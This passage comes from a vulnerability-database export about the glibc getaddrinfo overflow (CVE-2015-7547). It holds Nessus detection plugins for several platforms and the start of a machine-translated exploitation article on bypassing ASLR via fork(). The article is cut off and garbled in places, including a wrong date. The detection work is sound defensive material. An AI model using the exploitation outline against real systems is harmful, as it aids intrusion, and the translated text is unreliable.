Alternatively, apply the patch or recommended mitigation\nreferenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:arista:eos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"arista_eos_detect.nbin\");\n script_require_keys(\"Host/Arista-EOS/Version\");\n\n exit(0);\n}\n\n\ninclude(\"arista_eos_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/Arista-EOS/Version\");\next1=\"2.6.0/2980299.gamiltonsecAdvisory0017Patch.63\";\nsha1=\"16948241511ccf7044a8e1eeef4e55d2181194296ea02e22f2bd6df69a3f25386bf2938f3086f67a148d84d62ede10fc530fbbbd27a58bb49d4c642ecc675690\";\next2=\"glibc-common.i686.rpm 2.13/4Ar\";\nsha2=\"ccdf8ad84ac1a7985d89b026a6a311533a0f028c4a80c9a8fafa9b1ac4386fe169adb15145faea2e8c8f8cc8e9152f42150c9bd7df63b4dbd4612641d9aabded\";\n\nif(eos_extension_installed(ext:ext1, sha:sha1) || eos_extension_installed(ext:ext2, sha:sha2)) \n exit(0, \"The Arista device is not vulnerable, as a relevant hotfix has been installed.\");\n\nvmatrix = make_array();\nvmatrix[\"all\"] = make_list(\"0.0<=4.11.99\");\nvmatrix[\"F\"] = make_list(\"4.13.1.1<=4.13.6\",\n \"4.14.0<=4.14.5\",\n \"4.15.0<=4.15.4\");\n\nvmatrix[\"M\"] = make_list(\"4.13.7<=4.13.14\",\n \"4.14.6<=4.14.11\");\n\nvmatrix[\"misc\"] = make_list(\"4.12.5.2\",\n \"4.12.6.1\",\n \"4.12.7.1\",\n \"4.12.8\", \n \"4.12.8.1\", \n \"4.12.9\", \n \"4.12.10\",\n \"4.12.11\",\n \"4.14.5FX\",\n \"4.14.5FX.1\",\n \"4.14.5FX.2\",\n \"4.14.5FX.3\",\n \"4.14.5FX.4\",\n \"4.14.5.1F-SSU\",\n \"4.15.0FX\",\n \"4.15.0FXA\",\n \"4.15.0FX1\",\n \"4.15.1FXB1\",\n \"4.15.1FXB\",\n \"4.15.1FX-7060X\",\n \"4.15.1FX-7260QX\",\n \"4.15.3FX-7050X-72Q\",\n \"4.15.3FX-7060X.1\",\n \"4.15.3FX-7500E3\",\n \"4.15.3FX-7500E3.3\",\n \"4.15.4FX-7500E3\");\nvmatrix[\"fix\"] = \"Apply one of the vendor supplied patches or upgrade to EOS 4.15.5M /4.14.12M / 4.13.15M or later\";\n\nif (eos_is_affected(vmatrix:vmatrix, version:version))\n{\n security_report_v4(severity:SECURITY_WARNING, port:0, extra:eos_report_get());\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Arista Networks EOS\", version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2021-01-17T12:50:32", "description": "From Red Hat Security Advisory 2016:0175 :\n\nUpdated glibc packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more\nshared libraries that make use of static thread local storage. 
While\nstatic thread local storage is the fastest access mechanism it may\nalso prevent the shared library from being loaded at all since the\nstatic storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any\nmore object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of\nlarge thread-local storage data that exceeded PTHREAD_STACK_MIN in\nsize (generally 16 KiB). The bug in librt has been corrected and the\nimpacted APIs no longer return errors when large thread-local storage\ndata is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "Oracle Linux 6 : glibc (ELSA-2016-0175)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2016-0175.NASL", "href": "https://www.tenable.com/plugins/nessus/88776", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0175 and \n# Oracle Linux Security Advisory ELSA-2016-0175 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88776);\n script_version(\"2.18\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0175\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Oracle Linux 6 : glibc (ELSA-2016-0175)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0175 :\n\nUpdated glibc packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more\nshared libraries that make use of static thread local storage. 
While\nstatic thread local storage is the fastest access mechanism it may\nalso prevent the shared library from being loaded at all since the\nstatic storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any\nmore object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of\nlarge thread-local storage data that exceeded PTHREAD_STACK_MIN in\nsize (generally 16 KiB). The bug in librt has been corrected and the\nimpacted APIs no longer return errors when large thread-local storage\ndata is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-February/005782.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T15:21:39", "description": "The remote VMware ESXi host is 5.5 prior to build 3568722 or 6.0\nprior to build 3568940. It is, therefore, affected by a stack-based\nbuffer overflow condition in the GNU C Library (glibc) DNS client-side\nresolver due to improper validation of user-supplied input when\nlooking up names via the getaddrinfo() function. 
An attacker can\nexploit this to execute arbitrary code by using an attacker-controlled\ndomain name, an attacker-controlled DNS server, or through a\nman-in-the-middle attack.", "edition": 26, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-23T00:00:00", "title": "ESXi 5.5 < Build 3568722 / 6.0 < Build 3568940 glibc DNS Resolver RCE (VMSA-2016-0002) (remote check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-23T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2016-0002_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/88906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88906);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_bugtraq_id(83265);\n script_xref(name:\"VMSA\", value:\"2016-0002\");\n script_xref(name:\"CERT\", value:\"457759\");\n script_xref(name:\"EDB-ID\", value:\"39454\");\n\n script_name(english:\"ESXi 5.5 < Build 3568722 / 6.0 < Build 3568940 glibc DNS Resolver RCE (VMSA-2016-0002) (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is 5.5 prior to build 3568722 or 6.0\nprior to build 3568940. It is, therefore, affected by a stack-based\nbuffer overflow condition in the GNU C Library (glibc) DNS client-side\nresolver due to improper validation of user-supplied input when\nlooking up names via the getaddrinfo() function. 
An attacker can\nexploit this to execute arbitrary code by using an attacker-controlled\ndomain name, an attacker-controlled DNS server, or through a\nman-in-the-middle attack.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144353\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144357\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144057\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144054\");\n # https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8bdae0a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://sourceware.org/bugzilla/show_bug.cgi?id=18665\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/23\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfixes = make_array(\n '5.5', '3568722',\n '6.0', '3568940'\n );\n\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\n\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\n\n# Lets extract the ESXi version\nver = ereg_replace(pattern:\"^ESXi? ([0-9]+\\.[0-9]+).*$\", replace:\"\\1\", string:ver);\n\nif (\n ver !~ '^5\\\\.5($|[^0-9])' &&\n ver !~ '^6\\\\.0($|[^0-9])'\n) audit(AUDIT_OS_NOT, \"ESXi 5.5 / 6.0\");\n\nfixed_build = fixes[ver];\n\n# We should never ever trigger this\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = eregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, \"VMware ESXi\", \"5.5 / 6.0\");\n\nbuild = int(match[1]);\n\nif (build < fixed_build)\n{\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi \", ver + \" build \" + build);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:51", "description": "New glibc packages are available for Slackware 14.1 and -current to\nfix security issues.", "edition": 28, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-24T00:00:00", 
"title": "Slackware 14.1 / current : glibc (SSA:2016-054-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-24T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:glibc-i18n", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:glibc-profile", "p-cpe:/a:slackware:slackware_linux:glibc", "p-cpe:/a:slackware:slackware_linux:glibc-solibs"], "id": "SLACKWARE_SSA_2016-054-02.NASL", "href": "https://www.tenable.com/plugins/nessus/88910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-054-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88910);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"SSA\", value:\"2016-054-02\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Slackware 14.1 / current : glibc (SSA:2016-054-02)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New glibc packages are available for Slackware 14.1 and -current to\nfix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.569827\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b214cba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/24\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", 
pkgname:\"glibc\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-i18n\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-profile\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-solibs\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-02-21T09:00:48", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "edition": 1, "description": "0x01 introduction \n2016 2 on 16 May, Google disclosed a critical buffer overflow vulnerability in the GLIBC library in the getaddrinfo function in the trigger. At the same time they also provided a copy of the PoC. Based on this, in this article, we will show how to by CVE-2015-7547 bypass ASLR. \n0x02 vulnerability description\ngetaddrinfo()function is the role by querying the DNS service, the host name and the server resolves to the addrinfo structure. \n! [](/Article/UploadPic/2017-2/201722018366486. png? www. myhack58. 
com) \nIn the getaddrinfo()function implementation, use the alloca()function on the stack allocated buffer for DNS responses. The beginning, the function first allocates a section of stack space for the DNS response, if the response time is too long, it will re-allocate a heap buffer for the response. But since the update to the code the buffer to the newly allocated heap buffer, stack of old buffer delay in the release, still use. This dangling pointer will cause a classic buffer overflow. \nASLR? ASLR! \nIn the above case, by this vulnerability cover the getaddrinfo()function's return address, but we should be the return address of the cover to where? When you enable ASLR system, The module address is random. Therefore, the attacker can not be attack stream address is set to the pre-set address. \nfork() \nfork()is Linux create a new process. A typical fork using the method as shown below: \n! [](/Article/UploadPic/2017-2/201722018366945. png? www. myhack58. com) \nfork a child process and the parent process use the same instruction segment, they only have the pid is not the same, and pid is the fork function returns to the child process. And windows under the code multiplexing, the difference is that here means that the child process and its parent processes share many characteristics-have the same register state, stack and memory layout. \n0x03 program flow example\nConsider a server application, its mode of operation is as follows: \n! [](/Article/UploadPic/2017-2/201722018366269. png? www. myhack58. com) \n1\\. Client remote connection to the application. \n2\\. Application your fork a child process for responding to client requests\n3\\. In processing the client request process, sub-process using\"getaddrinfo()\"function to parse the host name. At the same time, it to which DNS server to send DNS requests. \n4\\. The DNS server for the DNS request to make a legitimate response. \n5\\. The sub-process started and has parsed the host connection. 
